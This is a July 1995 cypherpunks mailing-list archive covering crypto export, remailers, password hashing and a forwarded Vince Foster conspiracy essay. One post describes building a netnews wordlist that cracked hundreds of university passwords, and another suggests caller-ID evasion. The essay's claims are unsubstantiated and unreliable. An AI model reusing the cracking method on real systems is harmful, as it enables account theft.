in the > Norman story? I've talked to Chuck in Kentucky and am still in touch with > him. But his stories have not panned out, even partially. I would be most > interested in your ideas. > > Best regards. > Greg > > - - > > > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBMBP21mX1Kn9BepeVAQGP3AP9Hm/kwmUuz9kNH+q9D728Xe6rdHHPjpT8 > bAxwzIK9UsJsIF5oLfjTVWovEtGBj3QvJlmFY7hkVFZAYpx6q4R65NUX/ZpHtKaF > QDugRJZJUxKRaD+9CYepFFt6+ZTK8pQr+me3CgY1ZBVbdNZL4LE9rLFA1Z4XD/vL > csNGnDpuTq0= > =t4hx > -----END PGP SIGNATURE----- > > From shamrock at netcom.com Mon Jul 24 21:58:22 1995 From: shamrock at netcom.com (Lucky Green) Date: Mon, 24 Jul 95 21:58:22 PDT Subject: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key) Message-ID: <199507250455.AAA13908@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , wb8foz at nrk.com (David Lesher) wrote: >marc: >> However, goods of U.S. origin are export restricted, unless said >> goods are further processed outside the U.S. so as to result in a >> substantial change in value, so some of the PGP development would >> need to be done in Canada. > >How about compiling it? THAT is "further processing"...... I am not sure that would hold. After all, the disk with the source code to "Applied Cryptography" was denied an export license, because the source code could be compiled into libraries. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMBR5PCoZzwIn1bdtAQGSygGAs0JN64qoFfzC0OEL+yV5p/iWecnTtBeJ Fm8a7jsIqtV+FsQg7ATQRcpSxtDOnbS2 =He6y -----END PGP SIGNATURE----- From wb8foz at nrk.com Mon Jul 24 22:00:26 1995 From: wb8foz at nrk.com (David Lesher) Date: Mon, 24 Jul 95 22:00:26 PDT Subject: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key) In-Reply-To: <3v1j6h$fge@blaze.cs.jhu.edu> Message-ID: > : How about compiling it? THAT is "further processing"...... > Perhaps...but I for one wouldn't trust anyone else to compile my copy > of PGP...would you? Not at all. But who says I must USE the compiled version? I get Linux with both source & object on one CD. Pick & choose as I please.... > And, note, it says sustantial change in value...I don't know if this is taken > to mean monetary, or usability...the later might work. Or offer many compiled versions, with source tree. Comes complete SYSIII, LISA, PET and TRS-80 versions!!!!! -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From bdolan at use.usit.net Mon Jul 24 22:13:29 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Mon, 24 Jul 95 22:13:29 PDT Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying (fwd) In-Reply-To: Message-ID: I found Grabbe's essay sufficiently interesting to forward, but all I did was forward it. If you have questions, you will do better to address them to: kalliste at delphi.com bd On Mon, 24 Jul 1995, Mac Norton wrote: > Okay, thing is, I read all of the below, and it seems like > the guy's trying hard to tell you that he'd bend over > backward to make this case, even to the extent of associating > with fringebinges like you, but your stuff keeps coming up > fulla, um, thin air. Huh? > > MacN > > On Mon, 24 Jul 1995, Brad Dolan wrote: > > > > > > > ---------- Forwarded message ---------- > > Date: Mon, 24 Jul 1995 23:11:45 -0400 (EDT) > > From: KALLISTE at delphi.com > > Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying > > > > -----BEGIN PGP SIGNED MESSAGE----- > > > > Allegations Regarding Vince Foster, the NSA, and > > Banking Transaction Spying, Part IX > > > > by J. Orlin Grabbe > > > > > > July 23, 1995 > > > > Gregory Wierzynski > > Assistant Staff Director > > U.S. House of Representatives > > Committee on Banking and Financial Services > > 2129 Rayburn Building > > Washington, D.C. 20515 > > 202-225-7502 > > > > Dear Mr. Wierzynski: > > > > Thank you for email letter, a copy of which is attached. > > > > I am not sure why you think my quoting selections from Mr. Jim Norman > > necessarily implies endorsement or acceptance of them on my part. I have, > > of course, quoted many, many selections from Mr. Norman, so perhaps you > > could be more specific with respect to the ones you are concerned about. > > > > Perhaps I could be of assistance to your inquiries among the spooks, if > > only you could describe to me which points you have investigated, and how > > you have investigated them. I certainly wouldn't want to promote anything > > that, as you say, "flied in the face of facts." > > > > On the other hand, I am greatly concerned about the use by Alltel > > Information Services (formerly Systematics) of a libel attorney, > > Charles O. Morgan, in an attempt to intimidate journalists and destroy > > the First Amendment to the U.S. Constitution. > > > > And I am also gravely concerned about the possible leak of U.S. codes > > and nuclear secrets to a foreign power, which is an issue of *real* > > national security concern to the U.S. (Of course you and I both know > > that "national security" is often used to hide the truth about sell-outs > > of national security from the American people, by clamping a lid on > > the discussion or reporting of things that are common knowledge among > > U.S. military and security agencies, and even common knowledge to the > > general public of the foreign power to which these secrets have been > > compromised.) > > > > Before reading my email, and your letter, I sent you a copy of "Part VIII: > > Allegations Regarding Vince Foster, the NSA, and Banking Transactions > > Spying". There you will see from the quotes that the theft of U.S. > > nuclear secrets by Israel is openly discussed in Israeli newspapers, so > > I am sure that this is not one of the "off-the-wall" issues to which > > you are referring. (With respect to that issue, I suggest that you do > > some investigation in Tel Aviv.) > > > > With respect to money laundering I am not concerned, for reasons I have > > indicated in my essay "The End of Ordinary of Money", Parts I and II, > > a copy of which I previously provided the Committee. The money-laundering > > laws ought to be abolished, but in the meantime I do find the selective > > enforcement of these laws troubling. > > > > With respect to "Chuck in Kentucky", I know more than one Chuck in Kentucky, > > so perhaps you could be more specific which Chuck you refer to. What stories > > did he tell you, and how is it that they didn't pan out? > > > > Since you have already spoken to both Jim and Chuck, I am taking the liberty > > of sending a copy of this letter (and your letter) to Jim Norman, and to one > > possible Chuck you may be referring to, so that perhaps they can explain to > > me their failing to satisfy you as to the accuracy of their information. > > > > Now, Mr. Wierzynski, I would like to bring up an issue about your Committee's > > behavior that is troubling me. I am sure that there is an innocent > > explanation that I am missing. You will recall the meeting that I had with > > you and Mr. Stephen Ganis, the Counsel to the Committee, at the Four Seasons > > in Georgetown on Monday, June 12, 1995. Two days previously I had been > > playing volleyball in the Mall with Dana Rohrbacher and Jack Wheeler and some > > others, and I had pulled most of the muscles in my right ankle. So I > > asked everyone I was meeting to come over to the hotel, and you and Mr. Ganis > > graciously consented. We met in the Four Seasons lounge, where I was the > > only person not wearing shoes. > > > > You told me that, more than money laundering in Mena, Arkansas, you were > > interested as to whether there were any documents connecting Vince Foster > > to Systematics, or whether I knew the name of any Systematics programmers > > that may have worked to modify the PROMIS software to spy on banking > > transactions. I told you I couldn't recall seeing any such documents, and > > that I had come across the name of one programmer, but I had subsequently > > forgotten it. It was a pleasant meeting, so to be helpful I gave you a > > copy of Jim Norman's *Fostergate* that had been spiked from *Forbes*. > > "Why would Steve Forbes kill the article?" you asked. I said I didn't > > know, but that--since you appeared to know Steve Forbes--you should call > > him yourself. > > > > Now, much to my surprise, I find that the following happened: Just as > > *Media Bypass* was about to run Jim Norman's article *Fostergate*, they > > received a letter from Charles O. Morgan, indicating grave consequences > > if they were so foolish as to print the article. Mr. Morgan claimed to know > > what was in the article, because, he said, he had received a copy from Mr. > > Stephen Ganis of your Committee! > > > > I am bothered by the fact that while you alleged to me you were investigating > > Systematics that at the same time you are passing along information to > > Systematics. I am sure there is an innocent explanation. But consider this: > > what if I had given you Foster-related documents and the names of Systematics > > programmers? Would these have been passed along to Mr. Morgan also? As you > > know, a number of people connected to this whole business have died violent > > deaths in Arkansas. (Of course, I understand some of them had already been > > paid off to keep their mouths shut, and didn't, and so--under any standard of > > morality--deserved what they got.) > > > > Well, things are never what they appear, so perhaps you can clear things up > > for me. Please pass along my concern to Mr. Ganis, and tell him I will be > > glad to sit down with him and have a drink, or share a line, and have a frank > > discussion about this issue. (I have nothing against the use of any drug, if > > used in moderation, and in the appropriate context.) > > > > Regards, > > Orlin > > > > Attachment: Your letter to me > > - --------------------------------------------------------------------- > > > > From: IN%"gregorw at netcom.com" 23-JUL-1995 19:53:52.82 > > To: IN%"KALLISTE at delphi.com" > > CC: > > Subj: RE: Part VII > > > > Return-path: > > Received: from netcom13.netcom.com by delphi.com (PMDF V4.3-9 #10880) > > id <01HT7ZLMQQTC9VUSVZ at delphi.com>; Sun, 23 Jul 1995 19:53:50 -0400 (EDT) > > Received: by netcom13.netcom.com (8.6.12/Netcom) id QAA03469; Sun, > > 23 Jul 1995 16:51:04 -0700 > > Date: Sun, 23 Jul 1995 16:51:04 -0700 > > From: gregorw at netcom.com (Gregory Wierzynski) > > Subject: Re: Part VII > > To: KALLISTE at delphi.com > > Message-id: <199507232351.QAA03469 at netcom13.netcom.com> > > Content-transfer-encoding: 7BIT > > > > Orlin -- > > > > We're reading your stuff with interest. Thank you for including me in your > > list of recipients; I pass the material on to my boss and my colleagues on > > the Committee. > > > > I am somewhat surprised, however, that you accept the Norman piece without > > raising any questions about its sources. We've talked to Jim and tried to > > check out the sources he thought he could share with us. We have also done > > a fair amount of investigating on our own using the resources available to > > us--by which I mean officials inquiries to the spooks. So far we draw a > > complete blank. Worse, the preponderance of the evidence suggests that > > Jim's piece is pretty much off-the-wall. Worse still, it appears to fly in > > the face not just of facts, but simple logic as well. > > > > I haven't, by any means, given up on this subject, but pursuing a trail > > grown cold is difficult to justify when you're paid by the taxpayer. > > > > Do you have suggestions on how we could verify some of the elements in the > > Norman story? I've talked to Chuck in Kentucky and am still in touch with > > him. But his stories have not panned out, even partially. I would be most > > interested in your ideas. > > > > Best regards. > > Greg > > > > - - > > > > > > > > -----BEGIN PGP SIGNATURE----- > > Version: 2.6.2 > > > > iQCVAwUBMBP21mX1Kn9BepeVAQGP3AP9Hm/kwmUuz9kNH+q9D728Xe6rdHHPjpT8 > > bAxwzIK9UsJsIF5oLfjTVWovEtGBj3QvJlmFY7hkVFZAYpx6q4R65NUX/ZpHtKaF > > QDugRJZJUxKRaD+9CYepFFt6+ZTK8pQr+me3CgY1ZBVbdNZL4LE9rLFA1Z4XD/vL > > csNGnDpuTq0= > > =t4hx > > -----END PGP SIGNATURE----- > > > > > From carolann at censored.org Mon Jul 24 23:10:45 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Mon, 24 Jul 95 23:10:45 PDT Subject: Crisis Overload (re Electronic Racketeering) Message-ID: <199507250610.XAA28570@mailhost.primenet.com> -----BEGIN PGP SIGNED MESSAGE----- I am a candidate for the Minneapolis City Council, 4th ward. As a registered Independent. Now if I can get a campaign donation to give every resident a copy of PGP, then I've got it made. I did run for Parks Commission in '79. 7,000 votes with no money. Love Always, Carol Anne >Direct mail is useful. But until you've worked to get someone elected, >you are just one more voice in the roar. The '96 campaigns are shaping >up. (I'm already putting the word out for '98...) This is the time to >find people who share our views, and work so that they win their >primaries--or maybe don't even have to fight one. Or maybe its time >_you_ ran. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBSJGorpjEWs1wBlAQEJKwQAqtAXLCf5yBvvV9A5fYs2PXnKAxZK/7r6 evqMlnA7YzYF1sCxRAbF82EKJm2oZhsdWYP18m/mj9u8+NVIuj639zxcyeXme/5b mMurG2itMzhv8AogQp2fPo9bTM0FjurUYLSCwXiFlv5TVeOXv6qYYD6bjVK7HJGM RkmX40AFiac= =FEwh -----END PGP SIGNATURE----- -- Member Internet Society - Certified BETSI Programmer - Webmistress ************************************************************************* Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 carolann at c2.org - carolb at spring.com - carolab at primenet.com ************************************************************************* My Homepage The Cyberdoc From loki at obscura.com Tue Jul 25 00:29:18 1995 From: loki at obscura.com (Lance Cottrell) Date: Tue, 25 Jul 95 00:29:18 PDT Subject: Mixmaster for DOS Yet? Message-ID: At 5:16 PM 7/22/95, bluebird at alpha.c2.org wrote: >[Please reply via netmail or Cc: - I have only periodic access to list.] > >Is the Mixmaster user software for DOS platforms completed yet? > >Thanks for any help. Not yet. It should be out shortly after the next Mixmaster release. I will make a lot of noise when I release the DOS code. You will not miss it. ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From carolann at censored.org Tue Jul 25 01:53:30 1995 From: carolann at censored.org (UnCensored Girls Anonymous) Date: Tue, 25 Jul 95 01:53:30 PDT Subject: The Big Win (doze)..A simple explanation Message-ID: <199507250853.BAA25871@mailhost.primenet.com> Now that I've gotten Eudora back, I found this totally simple explanation to it all. It came from Doc Ozone via a via a via So..... >>You make the call... >> >>Be seeing you, >> >>~ronC >> >>------- Forwarded Message >>(via mmesser at infinity.com). >> >> Given Microsoft's recently announced acquisition of the Roman Catholic >>Church, I find the following message, received earlier today, extremely >>distressing. >> >> --------------------------------------------------- >> >>The real name of "the" Bill Gates is William Henry Gates III. >>Nowadays he is known as Bill Gates (III), where "III" means the order >>of third (3rd.) >> >>By converting the letters of his current name to the ASCII-values and >>adding his (III), you get the following: >> >>B 66 >>I 73 >>L 76 >>L 76 >>G 71 >>A 65 >>T 84 >>E 69 >>S 83 >>+ 3 >> -------------- >> 666 !! >> >>Some might ask, "How did Bill Gates get so powerful?" Coincidence? Or >>just the beginning of mankind's ultimate and total enslavement??? >> >>YOU decide! >> >>Before you decide, consider the following: >> >>M S - D O S 6 . 2 1 >>77+83+45+68+79+83+32+54+46+50+49 = 666 >> >>W I N D O W S 9 5 >>87+73+78+68+79+87+83+57+53+1 = 666 >> >>Coincidence? I think not >> >>------- End of Forwarded Message -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From bart at netcom.com Tue Jul 25 02:14:45 1995 From: bart at netcom.com (Harry Bartholomew) Date: Tue, 25 Jul 95 02:14:45 PDT Subject: (fwd) INTERNET APPLICATIONS ENGINEER/CommerceNet Message-ID: <199507250912.CAA02676@netcom18.netcom.com> Found this during my job search. Lacking the skills myself, thought perhaps someone else on the list might be interested. -------------------------------------------------------------- Enterprise Integration Technologies (EIT) is a recognized pioneer in the development of software and services for electronic commerce on the Internet. EIT has played significant management roles in Terisa Systems, a company that develops, markets, licenses, and supports technologies that make secure Internet transactions possible and CommerceNet Consortium, which facilitates the use of an Internet-based infrastructure for electronic commerce to allow efficient interactions among customers, suppliers and development partners. Additionally, EIT was integrally involved in the development of WebSite, a product of O'Reilly & Associates, Inc. The following position is currently available: INTERNET APPLICATIONS ENGINEER/CommerceNet REQ #103 As a CommerceNet development team member you will be responsible for developing Internet-based security-enabled electronic commerce applications. The focus will be integrating secure peer-to-peer messaging technologies, secure distributed hypermedia environments (e.g., World-Wide Web, S-HTTP, and SSL), and relational databases to support a variety of electronic commerce processes. Develop applications in support of public key certification authorities. The first test of an integrated secure email and WWW solutions will be with CommerceNet members from the electronics industry. Will work with these members in the Electronics Industry Pilot who wish to reengineer their Request for Quotation processes using Internet-based technologies. The ideal candidate will have: � BSCS or equivalent � Programming languages (e.g., C, C++), scripting languages (e.g., Perl) � HTML, TCP/IP, SMTP and HTTP experience � Experience with relational databases is desirable � Experience writing CGI applications for the World-Wide Web � Experience with public key and symmetric cryptography If you are interested, send your resume via e-mail to eit-jobs at eit.com or you can fax your resume to (415) 617-8019. Please indicate the requisition number of the position for which you are applying. If you want to mail us a resume, please send it to: Enterprise Integration Technologies 800 El Camino Real Menlo Park, California 94025 EOE, Principals only please From perry at imsi.com Tue Jul 25 02:46:14 1995 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 25 Jul 95 02:46:14 PDT Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying (fwd) In-Reply-To: Message-ID: <9507250946.AA01832@snark.imsi.com> Could we end this series of irrelevancies, please? This is not ConspiracyPunks, this is cypherpunks. We deploy cryptography, not random conspiracy theories. .pm Brad Dolan writes: > > > ---------- Forwarded message ---------- > Date: Mon, 24 Jul 1995 23:11:45 -0400 (EDT) > From: KALLISTE at delphi.com > Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying > > -----BEGIN PGP SIGNED MESSAGE----- > > Allegations Regarding Vince Foster, the NSA, and > Banking Transaction Spying, Part IX > > by J. Orlin Grabbe > From jlasser at rwd.goucher.edu Tue Jul 25 06:30:09 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Tue, 25 Jul 95 06:30:09 PDT Subject: community standards in cyberspace (fwd) Message-ID: Nice thought, but... well... I wish the congresscritters thought that way... Jon ------------------------------------------------------------------------------ Jon Lasser (410) 494-3253 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. ---------- Forwarded message ---------- Date: Mon, 24 Jul 1995 22:49:43 -0700 (PDT) From: Tildy Bayar To: bdsm-list at blob.best.net Subject: community standards in cyberspace (fwd) > [exerpt] > > DEVIANCE -- COMPARED TO WHAT? > Peter Huber, author of "Orwell's Revenge" and senior fellow at the Manhattan > Institute, points out that "community standards" are no longer definable in > cyberspace. "`Deviance' loses its meaning, when communities of the > like-minded are formed entirely by consent. Freedom of association is so > complete in cyberspace that traditional limits on freedom of speech become > almost impossible to justify constitutionally." (Forbes 7/31/95 p.110) From droelke at spirit.aud.alcatel.com Tue Jul 25 08:17:01 1995 From: droelke at spirit.aud.alcatel.com (Daniel R. Oelke) Date: Tue, 25 Jul 95 08:17:01 PDT Subject: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key) Message-ID: <9507251516.AA21669@spirit.aud.alcatel.com> > : marc: > : > However, goods of U.S. origin are export restricted, unless said > : > goods are further processed outside the U.S. so as to result in a > : > substantial change in value, so some of the PGP development would > : > need to be done in Canada. > > : How about compiling it? THAT is "further processing"...... > > Perhaps...but I for one wouldn't trust anyone else to compile my copy > of PGP...would you? I would use a precompiled version of PGP *if* it came from and was signed by someone I trusted. After all - I don't read all the source code - do you? > And, note, it says sustantial change in value...I don't know if this is taken > to mean monetary, or usability...the later might work. > It's an interesting idea. > Jeremy > I would say that if you can sell something that people would otherwise get for free, then you have added value. So, pre-compile for a couple of architectures, and then slap them on a CD-ROM with source. Definite tangable value from the CD-ROM then. Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX http://spirit.aud.alcatel.com:8081/~droelke/ From sjb at austin.ibm.com Tue Jul 25 09:11:10 1995 From: sjb at austin.ibm.com (Scott Brickner) Date: Tue, 25 Jul 95 09:11:10 PDT Subject: Three strikes you're out! for politicians... yeah we wish! In-Reply-To: Message-ID: <9507251610.AA16331@ozymandias.austin.ibm.com> In message Craig Hubley writes: >Any time the Supreme Court strikes down a law, any politician who has been >found to have voted in favor of three such laws is immediately stripped of >all offices and rendered ineligible to run for public office ever again, >at any level. This might be nice, but questions of "upsetting the system of checks and balances" aside, you can't do it. It would violate Article I, Section 6 of the Constitution, which says that "for any speech or debate in either House, [the Senators and Representatives] shall not be questioned in any other place". "Speech or debate" would cover the vote on any question. Therefore, the only organization which can hold a senator/representative liable for passing a bad law is the one which passed the law. :( From Andrew.Spring at ping.be Tue Jul 25 09:59:21 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Tue, 25 Jul 95 09:59:21 PDT Subject: big word listing Message-ID: > >Instead of that, send H(pid,clock,hostname,H(password)) to the server, for >some hash function H(). Then the server only needs to keep H(password) >around, rather than the plain password. This is similar to current >systems, except the plain password isn't sent across the network. > >H() can be whatever you fancy; 25 crypts, MD5, SHA-1, etc. Of course, >I'm sure this is far from being a new idea... Keeping H(password) on the server and logging in with H(blob,H(password)) is no different than keeping the password on the server and logging in with H(blob,password). Anyone who can read the password file on the server can authenticate himself. To protect against packet sniffers monitoring your login stream _and_ system crackers looking at the password file, you need some form of PKC. Free-after-1997 example: g is a generator of a prime p. password is X (0 PGP Print: 0529 C9AF 613E 9E49 378E 54CD E232 DF96 Thank you for question, exit left to Funway. From sjb at austin.ibm.com Tue Jul 25 09:59:56 1995 From: sjb at austin.ibm.com (Scott Brickner) Date: Tue, 25 Jul 95 09:59:56 PDT Subject: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key) In-Reply-To: <199507250455.AAA13908@bb.hks.net> Message-ID: <9507251659.AA16288@ozymandias.austin.ibm.com> In message <199507250455.AAA13908 at bb.hks.net> Lucky Green writes: > >In article , wb8foz at nrk.com (David Lesher) wrote: > >>marc: >>> However, goods of U.S. origin are export restricted, unless said >>> goods are further processed outside the U.S. so as to result in a >>> substantial change in value, so some of the PGP development would >>> need to be done in Canada. >> >>How about compiling it? THAT is "further processing"...... > >I am not sure that would hold. After all, the disk with the source code to >"Applied Cryptography" was denied an export license, because the source >code could be compiled into libraries. So? The ITAR doesn't control export to Canada. Export the source code to Canada, compile, validate, sign, and put on CD in Canada, and export to the world. I also seem to remember a while back (Mar/Apr) someone reported here that the Canadian bureaucrat responsible for executing import/export rules said that he didn't consider crypto to be restricted by Canada's rules. From stewarts at ix.netcom.com Tue Jul 25 10:45:21 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 25 Jul 95 10:45:21 PDT Subject: CALLER ID AVOIDANCE Message-ID: <199507251742.KAA13448@ix3.ix.netcom.com> >> > If one can afford it, I suggest chaining through >> > 1-900-CUT-TRAX and 1-900-STO-PPER I thought that at least 1-900-stopper kept logs in case they got subpoenaed or sued or had billing disputes or whatever? #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/ M0V]N9W)E2!T;R!A > 0. Mobsters still get caught and thrown in jail. > 1. They don't use crypto at all. All records are in the open and >searchable. LEA's wet dream. > 2. They use strong crypto and can't be caught at all. LEA's nightmare. > 3. They use crypto, but are still catchable (oops, the secret is out of >the bag now, cancel all the computer related RICO nonsense.) > 4. They don't use crypto, but keep no records, or hide them well. They >can still be caught by LEA's. > > 3 & 4 are the most likely, and the LEA's shameful little secret. They >cry wolf to set a wolf trap, but meanwhile they're hunting wabbits, not >wolves. Nah, they're hunting sheep, and they've been pretty successful so far. Right after the OKC bombing, Freeh was saying that he needed to ban encryption and get more funds for Digital Telephony to stop terrorists. 2 isn't credible, except for purely-data crimes like money-laundering, tax evasion, and conspiracy. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/ M0V]N9W)E2!T;R!A As a relatively new person to cryptography, I am trying to read and research, as well as follow this list, everything I can about the subject. Because of this interest, I have a few questions for the list. 1) What is Defcon? I am not that far from Las Vegas and am interested in the conference and how I might attend. 2) Similarly, how would I get information on Crypto '95? I have read the papers from previous years and I would be interested in running up to Santa Barbara to check it out. And on a different note, 3) Has anyone heard much about the security of First Security National Bank? (www.fsnb.com) I checked out what they have available already and it seems well put together. I realize they haven't released the "white" paper with specific security (cryptographic) specs on it yet, but has anyone heard anything yet? If it is as secure as it claims, I might consider opening an account with them. Thanks, Joel Hames jhames at deltanet.com From cman at communities.com Tue Jul 25 11:41:14 1995 From: cman at communities.com (Douglas Barnes) Date: Tue, 25 Jul 95 11:41:14 PDT Subject: Remailer economics, Java & remailers Message-ID: In a previous post I mentioned that in a remailer economy, remailer users should have the opportunity to earn pre-paid service tokens by acting as part of a remailer network. I also mentioned that this had the benefit of providing cover traffic for the remailer user's own activities. Some people pointed out that their ISP agreements forbid them to run remailers (!), and that not everyone is willing to tackle the (as yet undetermined) legal liability or risk of general legal hassle (which we've seen so far) of running a remailer. First of all, the user client should present the user who wishes to earn service tokens with the choice of registering as a terminal or non-terminal remailer link. People get paid more to be terminal links, since that's the person who is most likely to get hassled. Second of all, most of the attacks on remailers, as well as any ISP technique for detecting them, are based on some remailer's use of SMTP which is a logged service operating on a known port. This would be avoided by coevolving Mixmaster with "remailing bandwidth and reputation" servers (spiritual descendents of Raphe's remailer pinging service). Something which is taking a small step in this direction is the WWW front end to remailers available at c2.org as: http://www.c2.org:80/remail/by-www.html. Note that it has lots of security problems, but it has interesting conceptual aspects (it is also extremely easy to use.) Note that if one were using Java, one could fetch the application via Netscape, and run it within an HTML document in a Netscape window, but the sending of the mail could be done using any appropriate network port or protocol without routing back through the server where the document came from -- the applet would just open socket(s) as appropriate and go for it. (Depending on the user's security settings, a variety of "is it ok for this applet to do such-and-so" messages may be displayed.) My gut feeling is that serious remailer users and operators will ultimately want a standalone application (which can still be written in Java, and share code with the applet version), but that's a religious war we don't need to get into again. From perry at imsi.com Tue Jul 25 11:48:29 1995 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 25 Jul 95 11:48:29 PDT Subject: Questions about Conferences In-Reply-To: <9507251837.AA29943@deltanet.com> Message-ID: <9507251848.AA20053@snark.imsi.com> Joel Hames writes: > 1) What is Defcon? Some hacker convention. It doesn't have anything to do with crypto per se. .pm From strick at yak.net Tue Jul 25 12:07:59 1995 From: strick at yak.net (strick at Jihad) Date: Tue, 25 Jul 95 12:07:59 PDT Subject: big word listing In-Reply-To: <199507242154.OAA05021@comsec.com> Message-ID: <199507251751.RAA00418@jihad.yak.net> % | see if the password is in it. My question is, are there any pre-built lists of % | this nature? I am currently only using a spelling dictoinary, and would like % | somthing a little bigger. I made one really easily once with a tiny awk program that read files and remembered all the words (in a big table, with the old ``table[word]=1'' trick, then iterate the table and print it out). I probably used 'tr -cd' in front of it to get rid of non-alfa stuff. I fed it netnews -- especially hierachries with folklore, unix, rec.all, sex, etc. And it made a dictionary that cracked several hundred passwords (from a Major University /etc/passwd) in about 24 hours of SparcStation II time (i think ... this was six years ago). I remember finding the word 'creat' -- doubtless obtained from the unix wizards group -- and a whole family of machine-generated accounts whose password was 'pw'. I'm not sure these words exist in dictionaries, but they do in netnews and passwords. anyway -- it's fun to make your own. strick From aba at dcs.exeter.ac.uk Tue Jul 25 12:37:47 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Tue, 25 Jul 95 12:37:47 PDT Subject: ANNOUNCE: Regulatory Arbitrage - Free Speech Server Message-ID: <1298.9507251936@exe.dcs.exeter.ac.uk> The Free Speech Server ---------------------- In an attempt to preempt senator Exon and his thought police, and to demonstrate to such other utterly misguided, utterly clueless net-illiterates who somehow get ahold of the notion that it is even *possible* to censor peoples words and conversations on the Internet, that what they seek is indeed impossible. This is a simple demo of why it is impossible to censor the net. The Net is international, and in the apt words of Tim May's .sig quote: "National borders are just speed bumps on the information superhighway." The concept of "Regulatory Arbitrage" term meaning of course: shopping for suitable regulations, so if the US has silly "indecency" laws, well just store your words in another jurisdiction. Free Speech Server, jurisdiction Netherlands -------------------------------------------- Alex de Joode has kindly hosted an exon(tm) free speech server on replay.com: http://www.replay.com/exon/ is an automated double-speak translator. It will translate between text in goverment approved thought policed language back into free speech. So, the canonical example, a comlaint against Senator Exon (spit), Exonized(tm) so that even the most zealous US government internet thought police could not complain: ---------------------------------------------------------------------- Senator Exon may I express my annoyance you're a person who is overly sensitive to vulgar speech. This has lowered my opinion of you considerably for your work on the communications decency bill. President Clinton and his crowd of law enforcement officials seem to be overly keen in their attempts to regulate the information super highway. In my opinion they are just understandably scared of losing their much abused so called legitimate wiretap capabilities. It seems highly inappropriate that incompetents like you should be deciding matters about which you have little knowledge. ---------------------------------------------------------------------- Feed that into the WWW forms interface on www.replay.com (click on the unexonize toggle button, and select the "exon" dictionary, and you get back my original message to Exon, ahh much better this really says what I had to say: ---------------------------------------------------------------------- X-Regulatory-Arbitrage-URL: http://www.replay.com/exon/ X-Authors-Preferred-Speech: exon X-Comment: Regulatory Arbitrage in action, free speech server NL Exon fuck you you're a prudish prick. May you rot in hell for your work on the government censorship bill. Slick Willy and his gang of jack booted thugs seem to be fucking falling over themselves in their attempts to censor the net. In my opinion they are just scared shitless of losing their illegal wiretaps. It seems fucking way out of order that assholes like you should be deciding matters about which you know squat. ---------------------------------------------------------------------- The mechanism used to do the translation is phrase replacement, there are facilities for you to add your own phrases if the dictionaries do not cover what you want to say. Please join in and add your own phrases, so that the dictionaries get more interesting. It works by replacing phrases, so in the above: 'fuck you' <-> 'may I express my annoyance' 'fucking way out of order' <-> 'highly inappropriate' 'know squat' <-> 'have little knowledge' etc. Jurisdictional Information -------------------------- The first server is located in the Netherlands, so there are liberal pornography laws, lower age of consent, no thought crimes, freedom of speech, and privacy are still valued, the are no restrictions on "indecent speech", no restrictions on crypto export, etc, etc. The idea is that in your own jurisdiction (US or other oppressive regime with government censorship) you are only saying something within the bounds of censored government speech and thought guidlines, and yet you have a comment, which says what language you *would* use if you weren't being censored, ie you inculde as a header, or a comment in your post what your preferred speech is in terms of a selection of "exon" dictionaries: X-Authors-Preferred-Speech: exon,legislese,sarcasm You haven't actually *said* anything which would require 'correction' by the thought police, rather you have just said what words you would use if you were allowed to. You could also view it as a form of (weak) text stego, saying one thing, but meaning another to a sufficient extent to maintain plausible deniability. Uses ---- It is starting to look like the US will have in place a set of regulations which will make it illegal to use "vulgar speech" or "indecent speech" on the internet. In fact it is looking like you will be able to say less on the internet than could be written in a book in a bookstore or library. Whilst the above example was in terms of 4 letter words, there are dictionaries for several topics, which you as user of the system you can add phrase to for your amusement: exon: "fuck you" <-> "may I express my 